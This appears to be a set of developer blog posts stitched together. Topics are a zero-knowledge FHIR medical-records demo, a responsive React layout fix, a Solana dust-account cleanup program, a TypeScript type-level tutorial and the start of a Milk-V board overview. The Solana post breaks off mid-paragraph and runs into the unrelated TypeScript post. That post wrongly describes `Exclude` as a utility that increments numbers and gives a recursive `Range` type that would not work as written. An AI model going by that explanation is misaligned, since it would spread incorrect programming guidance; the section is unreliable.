--- # ZK-FHIR: A Medical Demo That Doesn’t Leak Patients Canonical: https://blog.skill-issue.dev/blog/zera_med_zk_fhir/ Description: Building a RISC Zero zkVM gateway for FHIR-shaped medical records — proofs over private patient data, zero-knowledge insurance claims, and HIV/STI compartmentalization. Published: 2026-02-11T06:29:06.000Z Tags: zera, zk, risc-zero, fhir, healthcare, privacy, cloudflare-pages The whole `zera_med_demo` repo exists because someone asked me, "if your privacy chain is real, prove it works for something other than crypto bros." Fair. So I spent a weekend building a working RISC Zero zkVM gateway for FHIR-shaped medical records. The MVP shipped at [commit 8ae0a7a — `Zera Medical ZK-FHIR Gateway MVP`](https://github.com/Dax911/zera_med_demo/commit/8ae0a7a64096376893206187e61e2c9f295a9050) on 2026-02-11. Full-stack: React frontend, Express + SQLite backend, real RISC Zero zkVM in `zkvm/`. Nine proof operations, every one of them running through an actual guest program — none of this "we'll mock the proof" demo nonsense. ## The shape of the problem FHIR is healthcare's answer to "data interoperability." The thing FHIR does not do is privacy. If a hospital sends FHIR records to an insurer to back a claim, the insurer learns the entire record. If a researcher queries an aggregate, the institution sending data has to trust the researcher's de-identification. ZK lets you flip that. The prover holds the private record. The verifier learns only what the proof's public outputs reveal. Everything else stays on the prover's side of the airgap. 
The MVP defined nine operations, each with a strict private/public split: ```rust // zkvm/methods/guest/src/main.rs match operation.as_str() { "record_commit" => run_record_commit(), "access_verify" => run_access_verify(), "aggregate_query" => run_aggregate_query(), "insurance_claim" => run_insurance_claim(), "consent_grant" => run_consent_grant(), "consent_revoke" => run_consent_revoke(), "emergency_access" => run_emergency_access(), "prior_auth" => run_prior_auth(), "compliance_audit" => run_compliance_audit(), _ => panic!("Unknown operation: {}", operation), } ``` The model: every guest reads private inputs (the patient record, the credential, the consent), commits exactly the public outputs the use case needs, and nothing else. `record_commit` for example is just a content-addressed handle — the journal carries `commitment_hash`, `patient_id_hash`, `record_type`, `resource_count`, `data_hash`. The actual conditions and observations never leave the prover. ## `access_verify`: the boring proof that justifies the whole thing If you only have the patience for one operation, it's this one. Doctor wants to read patient X. The hospital has a credential, the patient has signed a consent, and someone has to verify — without revealing the contents of the record — that the access was valid. From [`zkvm/methods/guest/src/main.rs`](https://github.com/Dax911/zera_med_demo/blob/8ae0a7a64096376893206187e61e2c9f295a9050/zkvm/methods/guest/src/main.rs): ```rust let credential_valid = !input.credential.role.is_empty() && !input.credential.institution.is_empty() && input.credential.valid_until >= input.current_timestamp; let consent_valid = input.consent.grantee_id == input.credential.accessor_id && input.consent.purpose == input.purpose && input.consent.valid_from <= input.current_timestamp && input.consent.valid_until >= input.current_timestamp; let authorized = credential_valid && consent_valid; ``` Boring. That's the point. The boring part is the predicate. 
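To see how small the predicate really is, here is the same authorization check mirrored in TypeScript (a sketch: field names follow the Rust excerpt above, camel-cased):

```typescript
// Mirrors the guest's credential + consent predicate. Nothing cryptographic
// happens here; in the real system this logic runs inside the zkVM and only
// the resulting bit is published.
interface Credential { role: string; institution: string; accessorId: string; validUntil: number }
interface Consent { granteeId: string; purpose: string; validFrom: number; validUntil: number }

function isAuthorized(cred: Credential, consent: Consent, purpose: string, now: number): boolean {
  const credentialValid =
    cred.role !== "" && cred.institution !== "" && cred.validUntil >= now;
  const consentValid =
    consent.granteeId === cred.accessorId &&
    consent.purpose === purpose &&
    consent.validFrom <= now &&
    consent.validUntil >= now;
  return credentialValid && consentValid;
}
```

Four field comparisons and two range checks. Any web developer could review it, which is exactly what you want from the trusted core of an access-control proof.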
The interesting part is that `input.patient_record` — which the predicate doesn't even read — never leaves the zkVM. The verifier learns: - Was access authorized? (a single bit) - What role accessed it? (`Doctor`, `Researcher`, `Insurer`) - A nullifier: ```rust let mut nullifier_hasher = Sha256::new(); nullifier_hasher.update(&input.credential.accessor_id); nullifier_hasher.update(&record_hash); nullifier_hasher.update(&input.current_timestamp); let nullifier = hex::encode(nullifier_hasher.finalize()); ``` The nullifier prevents the same access from being double-counted in audits. The record hash binds the access to a specific record without revealing it. That's the whole shape of every other operation in the demo. ## The detour: insurance claims that compartmentalize by carrier The next interesting commit is [c65cab8 — `Add ZKP visualization modal, HIV/STI data, insurer selectors`](https://github.com/Dax911/zera_med_demo/commit/c65cab8954ddc0a3ba7b308a58b36078497d34f9) on 2026-02-11. Three things landed at once: 1. **The ZK proof modal** — a full-screen animated panel that walks the user through `Private Data → RISC Zero zkVM → Proof Output`, with a comparison panel showing what the verifier sees vs. what the prover holds. Educational. People who've never touched a Groth16 receipt before will sit through 90 seconds of animation if it's pretty. 2. **HIV/STI data**. ICD-10 codes B20 (HIV disease), Z21 (asymptomatic HIV), Hep B/C, syphilis, gonorrhea, chlamydia, herpes, HPV. Plus viral load, CD4, PCR observations. ARVs: Biktarvy, Triumeq, Descovy PrEP. This is the data category that destroys lives when it leaks. So obviously this is the category the demo has to handle, or the demo is decorative. 3. **Insurer compartmentalization**. Each insurer's view is filtered to its own members. Aetna users don't see UnitedHealth records. 
The demo enforces this in the SQLite layer, but the ZK guest enforces it cryptographically — `insurance_claim` commits the insurer's identity in the journal, and the seed data is stamped with insurer membership. This isn't theoretical. Compartmentalization is the only reason this kind of demo isn't a HIPAA disaster waiting to happen. ## Cloudflare Pages: the dumb part of any full-stack demo Three of the six commits in the repo are deploy fixes. [c59509d — `Fix Cloudflare build: track src/data/types.ts`](https://github.com/Dax911/zera_med_demo/commit/c59509d3a6419944cb60cf6b1758dddc6f98b791), [2efff06 — `Add missing HospitalResult type`](https://github.com/Dax911/zera_med_demo/commit/2efff06c6d21c4a38fcb97d509a5b08bae5c039f), [1d0c2e2 — `Add wrangler.jsonc for Cloudflare Pages static asset deploy`](https://github.com/Dax911/zera_med_demo/commit/1d0c2e28a3c6a09381632cd9c6ca8155a6515d39). This is the part of every demo nobody writes about. You build a beautiful zk pipeline, you ship it to a static host, the host's build environment doesn't have a TypeScript file you forgot to track, and three commits later your gitignore is shorter and you've learned not to put `src/data/types.ts` in `.gitignore`. Real life. ## What this taught me The fact that I had to ship the *demo* before anyone took the privacy claim seriously is a recurring theme. People do not believe a chain is private because the white paper says so. They believe it because they can click a button labeled "Run Insurance Claim Proof" and watch the modal split private inputs from public outputs in real time. That modal is the most expensive component in the repo. It is also the only one that materially changed how the demo lands. The other thing this taught me: RISC Zero is unreasonably good for "let me prove a JavaScript-like predicate over JSON-shaped private data without learning to write Circom." The guest is just Rust. The verifier is a single library call. 
If your team's bottleneck is "we can't hire a circuit engineer for one demo," reach for a zkVM before you reach for snarkjs. ## Further reading - [zera_med_demo on GitHub](https://github.com/Dax911/zera_med_demo) — the whole repo. - [Initial MVP commit](https://github.com/Dax911/zera_med_demo/commit/8ae0a7a64096376893206187e61e2c9f295a9050) — full guest + host implementation. - [RISC Zero zkVM docs](https://dev.risczero.com/) — what `env::commit` actually does. - [HL7 FHIR spec](https://www.hl7.org/fhir/) — the data shape this demo is hiding. - [Building A Better Cryptocurrency](/blog/a_better_crypto/) — same privacy thesis, different vertical. --- # A Privacy Demo That Works on a Phone: Mobile Drawer, HUD Offsets, and Real Breach Data Canonical: https://blog.skill-issue.dev/blog/zera_med_responsive_hud/ Description: Bolting a mobile drawer onto the Zera Med ZK-FHIR demo without breaking the desktop sidebar, fixing AnimatePresence warnings, and updating PrivacyChallenge with 2024-2025 breach data. Published: 2026-02-11T22:48:22.000Z Tags: zera-med, react, tailwind, responsive, accessibility, framer-motion, demo The unspoken rule of demo apps is that they're built for laptops. You'd never demo a healthcare privacy product from a phone. You'd plug the laptop into a projector and run it from a 13" screen. Real users wouldn't be on a phone, the dataset has columns that don't fit on mobile, and you've shipped a desktop-only experience without thinking about it. But every demo I've done in 2026 has had at least one person in the room pulling up the URL on their phone *while I'm presenting*. They're checking the responsive design. They're clicking around in the half-attention you'd give a panel discussion. If the phone experience falls apart, that person walks away with the impression that the product falls apart, regardless of how clean the laptop view is. 
[`bb9bb51 — Add responsive layout with mobile drawer, centered content, and accuracy updates`](https://github.com/Dax911/zera_med_demo/commit/bb9bb51) on 2026-02-11 was the day I bolted on real mobile support. Six files changed, +4969 lines, three new pages. Let's look at what mattered.

## The mobile drawer pattern

The desktop nav is a fixed left sidebar. The mobile nav is a hamburger that slides a drawer in from the left. The trick is doing both with the same component tree:

```tsx
// Sidebar.tsx (excerpt — markup simplified, class names and animation values elided)
const isMobile = useMediaQuery('(max-width: 1023px)')
const [drawerOpen, setDrawerOpen] = useState(false)

return (
  <>
    {/* Mobile header — only on small screens */}
    {isMobile && (
      <header /* fixed, h-14, top-0 */>
        <button onClick={() => setDrawerOpen(true)} aria-label="Open menu">☰</button>
        <span>Zera Med</span>
      </header>
    )}

    {/* Sidebar — fixed left on desktop, slide-in drawer on mobile */}
    <AnimatePresence>
      {(!isMobile || drawerOpen) && (
        <motion.aside /* slide-in/out x transition */>
          {/* nav links */}
        </motion.aside>
      )}
    </AnimatePresence>

    {/* Backdrop — only when drawer is open on mobile */}
    {isMobile && drawerOpen && (
      <motion.div
        /* fixed inset-0 backdrop */
        onClick={() => setDrawerOpen(false)}
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        exit={{ opacity: 0 }}
      />
    )}
  </>
)
```

Three things to call out:

**`useMediaQuery` — not just `window.innerWidth`.** I added a tiny hook in this commit:

```tsx
// useMediaQuery.ts
export function useMediaQuery(query: string): boolean {
  const [matches, setMatches] = useState(() =>
    typeof window !== 'undefined' && window.matchMedia(query).matches
  )
  useEffect(() => {
    const mq = window.matchMedia(query)
    const onChange = (e: MediaQueryListEvent) => setMatches(e.matches)
    mq.addEventListener('change', onChange)
    return () => mq.removeEventListener('change', onChange)
  }, [query])
  return matches
}
```

The reason `window.innerWidth` is wrong: it doesn't subscribe to changes. You'd need a manual `resize` listener with debouncing. `matchMedia` with `addEventListener('change')` is the platform-native way and it's both faster (no JS resize event spam during drag-resize) and less code.

**`{(!isMobile || drawerOpen) && ...}`.** The mount/unmount logic. On desktop, the sidebar is always present. On mobile, it's only present when the drawer is open. This is what `AnimatePresence` needs to wrap correctly — the component literally unmounts when the drawer closes, which triggers the slide-out exit animation.

**Body scroll lock.** Not in the snippet but in the full diff: when the drawer is open on mobile, `document.body.style.overflow = 'hidden'` to prevent the underlying page from scrolling under the drawer. Without this, the drawer is open, the user starts scrolling, and the *page behind the drawer* scrolls instead of the drawer's contents. UX bug from hell.
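The scroll-lock decision is worth factoring into a pure function so it's testable outside the DOM. A sketch (the hook wiring is an assumption, not the repo's exact code):

```typescript
// Pure decision: what should document.body.style.overflow be?
function bodyOverflow(isMobile: boolean, drawerOpen: boolean): 'hidden' | '' {
  return isMobile && drawerOpen ? 'hidden' : '';
}

// In the component (React sketch):
//   useEffect(() => {
//     document.body.style.overflow = bodyOverflow(isMobile, drawerOpen);
//     return () => { document.body.style.overflow = ''; };
//   }, [isMobile, drawerOpen]);
```

The cleanup function matters as much as the set: if the component unmounts while the drawer is open, the body stays unscrollable forever.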
## Sticky HUDs and the mobile-header offset

The Zera Med demo has "HUD panels" that stick to the top of the page on each route — they show the current role (Patient/Doctor/Insurer/etc.) and a quick action menu. On desktop, they sit at `top: 0`. On mobile, the page has a 56px header at `top: 0` already, so the HUDs need to slide down by 56px:

```jsx
{/* HUD markup simplified; the offset classes are the point */}
<div className="sticky top-14 lg:top-0">
  {/* role indicator + quick actions */}
</div>
```

Tailwind's `top-14` is `3.5rem` = 56px. `lg:top-0` overrides for `lg+` viewports where the mobile header isn't rendered. Two utility classes, exactly the right offset, no media-query logic in the component. This is the kind of thing that's easy to miss until the demo opens on a phone and the HUD is hidden behind the mobile header. Then you spend ten minutes debugging because everything looks fine in dev tools' "responsive" mode, where the mobile header *is* shown but the layout is otherwise desktop. The fix is one className. Finding the bug is the project.

## Tight grids that collapse gracefully

The dashboards have grids like `grid-cols-4` and `grid-cols-6` for layouts of metric cards. On a 320px-wide phone, four cards across is 80px each, which is unreadable. The solution is per-breakpoint cols:

```jsx
{/* card markup reconstructed; component name illustrative */}
<div className="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-4 gap-4">
  {metrics.map(m => <MetricCard key={m.id} metric={m} />)}
</div>
```

This is the standard Tailwind approach — it's not novel — but applying it to *every grid* in the demo took a careful pass. Some grids in the original were `grid-cols-4` (no breakpoint prefix), which forced four-across on every viewport. The diff replaced 12 such grids with breakpoint-aware variants. The mental model I use: **`grid-cols-N` should always have a `<breakpoint>:grid-cols-K` partner unless you've intentionally decided "this layout is mobile-only" or "this layout never goes below 4 across."** The default of "this works on 1280px-wide screens and breaks below" is the desktop-blinkered version of the same component.

## Fixing the `AnimatePresence` warning

```
Warning: Each child in a list should have a unique "key" prop. Or alternatively when using AnimatePresence: AnimatePresence requires every child to have a unique `key` prop, even when only one child is rendered.
```

Anyone who's used Framer Motion has seen this. The PrivacyChallenge component had this exact bug — a single conditionally-rendered `<motion.div>` inside `<AnimatePresence>` with no key prop. The fix:

```jsx
<AnimatePresence mode="wait">
  {currentLab && (
    <motion.div key={currentLab.id} /* enter/exit animation props */>
      {/* lab content */}
    </motion.div>
  )}
</AnimatePresence>
```

The `key={currentLab.id}` is what tells AnimatePresence that "this is a *different* element when `currentLab.id` changes," and triggers the exit animation of the old one and the enter animation of the new one. Without the key, Framer Motion sees the same element with new props and skips the exit/enter cycle. The result is content swapping with no transition, plus the warning in console. `mode="wait"` is the other half: it tells Framer to wait for the exit animation to complete before mounting the next child. Without it, exit and enter happen simultaneously and the layout flashes during the crossover. This is in the docs. It's still the most common framer-motion mistake in the wild. The fix is two lines. Everyone gets bitten by it once.

## The PrivacyChallenge accuracy update

The most important part of this commit isn't the responsive plumbing.
It's the data:

> PrivacyChallenge: accuracy updates with 2024-2025 breach data and citations

The PrivacyChallenge is a four-level interactive component where the user plays "data broker" trying to re-identify anonymized records. Each level uses a real-world re-identification attack (k-anonymity failure, demographic triangulation, ZIP+DOB+sex matching, free-text leakage), and each level cites a real published breach. Before this commit, the citations were dated 2017–2020 — peer-reviewed but stale. After this commit, the citations include:

- The 2024 Change Healthcare ransomware attack (100M+ records).
- The 2024 Snowflake/AT&T breach (109M+ wireless customers).
- The 2025 Ascension Health breach (5.6M patients).
- The 2025 LabCorp / Synnovis crossover incidents.

Every breach in the citation list is real, dated within 24 months of the demo, and verifiable via public reporting. Why does this matter? Because the audience for this demo is healthcare buyers — IT directors, compliance officers, hospital CTOs — and they all know about the 2024 Change Healthcare breach. It cost UnitedHealth billions of dollars in damages and direct response costs. Every healthcare buyer's threat model has been re-shaped by it. **A privacy demo that doesn't reference the breach the audience just lived through is a demo that hasn't done its homework.** The same is true of the other items. A 2017 breach is academic; a 2024 breach is "this could happen to my hospital next quarter." The credibility of the demo is the credibility of its references.

## Trust Score formula fix and Level 4 RNG removal

Two smaller fixes in the same commit, both addressing demo failure modes:

**Trust Score formula.** The demo computes a "Trust Score" (0–100) showing how identifiable a record is after the user's deanonymization attempts. The original formula had an integer-division bug that produced 0 for any score below 1.0. The fix was switching to floating-point math.
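The shape of that bug, in an illustrative sketch (not the repo's actual formula; the re-identification direction and scaling are assumptions):

```typescript
// Buggy: truncate the ratio to an integer first, scale second.
// Any ratio below 1.0 collapses to 0 before the * 100 ever happens.
function trustScoreBuggy(reidentified: number, total: number): number {
  return Math.trunc(reidentified / total) * 100;
}

// Fixed: scale in floating point, round once at the end.
function trustScoreFixed(reidentified: number, total: number): number {
  return Math.round((reidentified / total) * 100);
}
```

Ordering is the whole bug: truncation before scaling destroys every fractional score, truncation after scaling only loses sub-point precision.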
Tiny diff, big visible difference — instead of every level showing "Trust Score: 0," the levels now show "Trust Score: 12 / 47 / 73 / 89" depending on how successful the user's attack was. **Level 4 always awards 3 stars.** The original Level 4 had an RNG-based reward — sometimes you got 3 stars for completing it, sometimes 2 stars, dependent on a `Math.random()` check. This was the wrong design. **A demo cannot have non-deterministic UX**, because if the demo person hits "the bad random roll" in front of a buyer, the buyer thinks the product is buggy. Removing the RNG and always awarding 3 stars on completion is the right call. The interactive challenge isn't a casino; it's a learning experience. The lesson: **deterministic demos beat dynamic demos every time.** If you want randomization, save it for the production app. ## What I'd do differently **The mobile drawer should have a swipe-to-close.** Right now you tap the backdrop or the close button. A swipe-left would be more native. Framer Motion's `drag` API would do it in 10 lines. **The HUD's `top-14` is hardcoded.** A CSS custom property `--mobile-header-height: 3.5rem` set on the body would let the HUD position itself relative to the *real* header height, not a magic number that goes wrong if the header ever changes. **The `useMediaQuery` hook should default to a server-safe value.** As written, the hook returns `false` on SSR, which would cause a flash if this demo ever ran with hydration. The Zera Med demo is pure CSR so it doesn't hit this, but the hook is a re-usable building block I should harden. ## Trade-offs **Why not use a router-aware drawer library?** Because the demo only has one drawer, on one page. Adding `vaul` or `@radix-ui/react-dialog` for one drawer is overkill. Framer Motion's `motion.aside` with hand-rolled state is 60 lines of code and zero new dependencies. 
**Why responsive at the design-token level (Tailwind classes) instead of CSS-in-JS?** Because Tailwind's responsive utilities are inline-readable. `lg:top-0` reads like "on lg+, top is 0," which is faster to skim than a styled-components prop spread across multiple breakpoints. The cost is verbosity; the benefit is grep-ability. **Why update breach citations instead of removing them?** Because the citations are the strongest argument the demo makes. Removing them would weaken the privacy case from "here's why this matters, citing real recent breaches" to "trust me, privacy matters." The harder pitch. ## What this taught me A demo that doesn't survive a phone is a demo that loses one in three viewers, even when the phone-watcher is a passive observer. Responsive design isn't optional even for desktop-target apps; it's the cost of admission for any web-shipped product. The accuracy/citation work taught me that **demo data quality is the demo.** The same modal animation, with stale 2017 breach data, is a less compelling product than the same modal with 2024 breach data. The cryptography is the same. The conviction in the audience is different. ## Further reading - [The bb9bb51 commit](https://github.com/Dax911/zera_med_demo/commit/bb9bb51) — the diff this post is about. - [Zera Med ZK-FHIR origin](/blog/zera_med_zk_fhir/) — the project this is bolted onto. - [ZkProofModal post](/blog/zera_med_zk_proof_modal/) — the animation pattern this commit also tweaks. - [Framer Motion AnimatePresence docs](https://www.framer.com/motion/animate-presence/) — the canonical docs for the warning I fixed. - [Tailwind responsive design docs](https://tailwindcss.com/docs/responsive-design) — the breakpoint prefixes I leaned on. - [HHS Breach Portal](https://ocrportal.hhs.gov/ocr/breach/breach_report.jsf) — the source of the 2024–2025 breach data the PrivacyChallenge cites. 
---

# Zera Janitor: Closing Solana Dust Accounts in Leptos WASM

Canonical: https://blog.skill-issue.dev/blog/zera_janitor_leptos_wasm/
Description: A Solana program + Leptos 0.7 frontend that scans your wallet for empty SPL token accounts, batches up to 25 closes per transaction via CPI, and pays you back 95% of the rent. The fee path is the actual interesting part.
Published: 2026-02-10T20:24:09.000Z
Tags: solana, rust, leptos, wasm, cpi, spl-token, side-quest

Solana has a fee model that punishes inactivity: every account on the network owes a rent deposit proportional to its data size, and most of those accounts are SPL token accounts (165 bytes, ~0.002 SOL of rent each). A wallet that has interacted with a hundred different airdrops and DEX pools accumulates a hundred token accounts holding zero balance. They sit there forever unless you `closeAccount` them, which costs you the cognitive overhead of figuring out which ones are dust and the fee of one transaction per close. The collective sleeping rent across all dusty Solana wallets is in the tens of millions of dollars. A clean-up tool is an obvious value capture. The catch: cleaning isn't free. You still need to *send* the transactions, and naive 1-account-per-tx flows hit the network limit immediately. That's the project I shipped on 2026-02-10 in [`7aeb309 — Initial implementation of Zera Janitor`](https://github.com/Dax911/SolFetc_rs/commit/7aeb309) — a Rust workspace with three crates:

1. **`shared/`** — common constants (program ID, vault seed, fee BPS).
2. **`program/`** — on-chain Solana program with one instruction (`BatchClean`) that closes up to 25 token accounts via CPI in a single tx.
3. **`app/`** — Leptos 0.7 client-side WASM frontend that scans the wallet, lets you select accounts, and submits batched transactions through a JS shim.
This post is about why each crate looks the way it does — particularly the fee-split economics on-chain and the CSR-WASM-with-JS-shim hybrid for transaction signing.

## The on-chain economics

The interesting part of `program/src/processor.rs` is *not* the close loop. It's what happens after:

```rust
// 5. Calculate rent collected
let lamports_after = vault.lamports();
let rent_collected = lamports_after
    .checked_sub(lamports_before)
    .ok_or(JanitorError::Overflow)?;
msg!("Rent collected: {} lamports", rent_collected);

// 6. Split: fee to treasury, remainder to user
let fee = rent_collected
    .checked_mul(FEE_BPS)
    .ok_or(JanitorError::Overflow)?
    .checked_div(BPS_DENOMINATOR)
    .ok_or(JanitorError::Overflow)?;
let user_payout = rent_collected
    .checked_sub(fee)
    .ok_or(JanitorError::Overflow)?;

// 7. Direct lamport transfer (vault is program-owned PDA)
**vault.try_borrow_mut_lamports()? -= fee + user_payout;
**treasury.try_borrow_mut_lamports()? += fee;
**user.try_borrow_mut_lamports()? += user_payout;
```

`FEE_BPS = 500` and `BPS_DENOMINATOR = 10_000`, so the fee is 5% and the user keeps 95%. Each closed account returns ~2,039,280 lamports of rent; if you close 25 in one batch you collect ~51M lamports (~0.051 SOL), the program keeps ~2.5M, and the user gets ~48.5M. Three things to note:

**The user signs once.** `process_batch_clean` walks the remaining `accounts` slice and assumes everything past the first four (user, vault, treasury, token program) is a token account to close. The CPI is `invoke_signed` because the *vault* (program PDA) signs as the destination of each `closeAccount`. The user only has to authorize the outer transaction, not each individual close. That's the whole point of the batch.

**The fee path is direct lamport math.** Step 7 does `**vault.try_borrow_mut_lamports()? -= fee + user_payout`. This is *only* legal because the vault is a program-owned PDA, and Solana lets a program directly mutate lamports on accounts it owns.
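Plugged into concrete numbers, the split works out like this (a TypeScript `bigint` sketch mirroring the on-chain math; the constants are the ones quoted above):

```typescript
const FEE_BPS = 500n;                 // 5%
const BPS_DENOMINATOR = 10_000n;
const RENT_PER_ACCOUNT = 2_039_280n;  // lamports returned per closed 165-byte token account

function feeSplit(accountsClosed: bigint): { fee: bigint; userPayout: bigint } {
  const rentCollected = RENT_PER_ACCOUNT * accountsClosed;
  const fee = (rentCollected * FEE_BPS) / BPS_DENOMINATOR;
  return { fee, userPayout: rentCollected - fee };
}
```

A full 25-account batch collects 50,982,000 lamports; the treasury keeps 2,549,100 and the user gets 48,432,900, which are the ~0.051 SOL / ~2.5M / ~48.5M figures above.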
If we tried this on the user's account we'd panic. If we tried it on the treasury (someone else owns it), the runtime would reject the transaction. The PDA-as-vault pattern is what makes the fee-split possible without a CPI to the system program.

**Checked arithmetic everywhere.** `checked_sub`, `checked_mul`, `checked_div` instead of `-`, `*`, `/`. On a Solana program, an integer overflow in non-checked arithmetic in release mode wraps silently. Wrapping a fee calculation gives an attacker an arithmetic vector. Every program written for production should use `checked_*` math even when the values are bounded by a 64-bit balance. The cost is cheap — a few extra CUs per op — and the alternative is worse.

## Why batched at 25?

The Solana transaction size limit is 1232 bytes. Each `closeAccount` CPI requires the destination's `AccountMeta` and the token account's `AccountMeta`, plus the inner instruction data. After accounting for the four base accounts (user/vault/treasury/token program) and the outer `BatchClean` instruction header, you can fit ~25 token accounts per transaction before bumping into the byte limit. The frontend respects this:

```rust
const MAX_ACCOUNTS_PER_TX: usize = 25;

let chunks: Vec<Vec<_>> = selected_accounts
    .chunks(MAX_ACCOUNTS_PER_TX)
    .map(|c| c.to_vec())
    .collect();

for chunk in &chunks {
    let num = chunk.len() as u8;
    let ix_data = build_batch_clean_data(num);
    // build metas, sign, send
}
```

If you select 100 dusty accounts in the UI, this fans out to 4 transactions. The user signs each one in their wallet. They all hit the same `BatchClean` instruction and the same fee-split logic.

## The Leptos 0.7 frontend, rendered client-side

Leptos is the Rust SolidJS-style framework — fine-grained reactive primitives, server-or-client rendering, compiles to WASM. For Janitor I went pure CSR (`app/Trunk.toml` set up for `--release`-mode WASM bundle), because the only thing the frontend needs to do is: 1. Connect to a wallet via JS shim. 2.
Scan token accounts via Solana RPC (HTTP, no need for a server). 3. Build instruction data in pure Rust. 4. Hand the instruction off to a JS shim for signing. 5. Display tx status. There's no server-side data, no SSR benefits. CSR + WASM keeps the deploy as static files on Cloudflare Pages. The Leptos contexts are how state is shared:

```rust
// Concrete type parameters are illustrative; the repo defines its own state structs.
let wallet = expect_context::<Signal<Option<WalletInfo>>>();
let accounts = expect_context::<ReadSignal<Vec<TokenAccount>>>();
let selected = expect_context::<RwSignal<HashSet<String>>>();
let set_processing = expect_context::<WriteSignal<bool>>();
```

If you've used SolidJS this is identical: `Signal` for reactive state, `ReadSignal`/`WriteSignal` split, `expect_context` to pull from a parent. The benefit over JS Solid is that the entire pipeline — RPC parsing, instruction encoding, vault PDA derivation — is in Rust, type-checked, with `?` propagation for errors. The Leptos UI code feels like 1:1 SolidJS in JSX-via-macro form.

## The JS shim is a load-bearing concession

I really wanted to do this entirely in Rust/WASM, no JS. I couldn't. The reason:

```rust
#[wasm_bindgen]
extern "C" {
    #[wasm_bindgen(js_name = zeraSignAndSend, catch)]
    async fn zera_sign_and_send(
        instruction_bytes: &[u8],
        account_metas: JsValue,
        blockhash: &str,
        rpc_url: &str,
    ) -> Result<JsValue, JsValue>;
}
```

This is an FFI into a JS function called `zeraSignAndSend` defined in the page's `<script>` tag.

[Click Here for Original](https://x.com/jamonholmgren/status/1751409105644982694?s=20)

---

## Utility Types: Exclude

In TypeScript, `Exclude` is a built-in utility type. It is not a keyword but a predefined type in the TypeScript standard library. The `Exclude` utility type is used to create a new type by excluding one set of types from another. Here's a simplified explanation:

```typescript
type Exclude<T, U> = T extends U ? never : T;
```

`Exclude<T, U>` produces a type that includes all the types from `T` that are not assignable to `U`. It utilizes conditional types to filter out types.
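A quick sanity check of that standard behavior (the union members here are arbitrary):

```typescript
// Exclude removes the union members assignable to the second type argument.
type Letters = "a" | "b" | "c";
type WithoutA = Exclude<Letters, "a">; // "b" | "c"

// Value-level witness: "a" would no longer type-check here.
const stillAllowed: WithoutA = "b";
```

Because conditional types distribute over unions, `Exclude` evaluates the `T extends U` test once per member of `T`, keeping the members where the answer is no.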
In the context of the original question and the code samples, `Exclude` appears as part of a type-level computation where it is employed to increment `Low` by 1 while building a range of numbers. To clarify, `Exclude` is not being used in the standard way here; the name is being leveraged creatively as a specific implementation detail, not as the documented behavior of the built-in utility type.

---

## Understanding Recursive Types: Range

So the answer given was actually:

```typescript
type Range<Low extends number, High extends number> =
  Low extends High ? never : Low | Range<Exclude<Low, High>, High>;
```

The `Range` type is a recursive type that generates a union of numbers from `Low` up to `High`. When `Low` equals `High`, the recursion gracefully ends with `never`. Otherwise, it forms a union of `Low` and the result of calling `Range` with `Low` incremented by 1 and `High` unchanged.

## Decoding the Magic of Exclude

```typescript
type Exclude<Low extends number, High extends number> =
  Low extends High ? never : Low + 1;
```

Now, let's unravel the mysteries of this custom `Exclude`. It is the piece that increments `Low` by 1. (Note that `Low + 1` is pseudocode: TypeScript has no arithmetic at the type level, so real implementations express the increment with tuple-length tricks.) It becomes instrumental in crafting types like our beloved `ZeroToHundred`, a union encompassing the numbers from 0 to 100.

```typescript
type ZeroToHundred = Range<0, 100>;
```

But why the incrementation? The answer lies in TypeScript's type system and its ability to generate unions through recursive types. When `Exclude` is employed, it lets TypeScript construct a union spanning the numbers between `Low` and `High`, with `Low` stepping up by 1 at each level of the recursion. This design leads to cleaner, more concise type definitions: with the help of this incrementing `Exclude`, we can generate a comprehensive range of numbers without the need to explicitly list each individual one.
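For completeness, here is one way the pattern actually compiles: a sketch that expresses the increment via tuple lengths. The helper names `BuildTuple` and `PlusOne` are my own, not from the original answer:

```typescript
// A tuple with exactly N elements, built one `unknown` at a time.
type BuildTuple<N extends number, Acc extends unknown[] = []> =
  Acc["length"] extends N ? Acc : BuildTuple<N, [...Acc, unknown]>;

// N + 1, read off as the length of an (N+1)-element tuple.
type PlusOne<N extends number> = [...BuildTuple<N>, unknown]["length"] & number;

type Range<Low extends number, High extends number> =
  Low extends High ? never : Low | Range<PlusOne<Low>, High>;

type ZeroToFive = Range<0, 6>; // 0 | 1 | 2 | 3 | 4 | 5 (High itself is excluded)
```

The same shape scales up to `Range<0, 100>`, though very large ranges can run into TypeScript's recursion-depth limits.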
--- ## Empowering Efficient Type Definitions In summary, `Exclude` is the unsung hero that facilitates the incremental dance of `Low` in TypeScript's `Range` and other recursive types. ```typescript // Example usage: const numberInRange: ZeroToHundred = 42; // Valid, as 42 is in the range 0 to 100 const outsideRange: ZeroToHundred = 150; // Error, as 150 is outside the range 0 to 100 ``` This approach not only enhances efficiency but also provides manageability, especially when dealing with expansive ranges of numbers. So, the next time you encounter a recursive type in your TypeScript journey, embrace the enchantment of `Exclude`. Let it be your guide to crafting elegant and powerful type definitions. Happy coding, fellow TypeScript enthusiasts! 🤖 --- # Introducing the Milk V Canonical: https://blog.skill-issue.dev/blog/introducing_milkv/ Description: Milk-V Duo is an ultra-compact embedded development platform. It can run Linux and RTOS, providing a reliable, low-cost, and high-performance platform for professionals, industrial ODMs, AIoT enthusiasts, DIY hobbyists, and creators. Published: 2024-07-12T00:00:00.000Z Tags: risc v, risc-v, risc, isa, open-source, architecture, customizable, embedded ## Introducing the Milk V: Unlocking the Power of RISC-V The Milk V is a series of innovative products designed to harness the potential of RISC-V, an open-source instruction set architecture (ISA) that is revolutionizing the world of embedded systems. Developed by Milk-V, a company dedicated to providing high-quality RISC-V products, these devices cater to developers, enterprises, and consumers alike, promoting the growth of the RISC-V ecosystem. ## Models in the Milk V Series The Milk V series includes several models, each tailored to meet specific needs and applications: 1. **Milk-V Duo**: This model features dual cores up to 1GHz (optional RISC-V/ARM), up to 512MB of memory, and a 1TOPS@INT8 TPU. 
It integrates wireless capabilities with Wi-Fi 6/BT 5 and comes equipped with a USB 2.0 HOST interface and a 100Mbps Ethernet port. The Duo supports dual cameras (2x MIPI CSI 2-lane) and MIPI video output (MIPI DSI 4-lane).
2. **Milk-V Duo S**: This variant of the Duo offers dual cores up to 1GHz (optional RISC-V/ARM), up to 256MB of memory, and a 1TOPS@INT8 TPU. It is capable of running both Linux and RTOS simultaneously and features rich I/O interfaces.
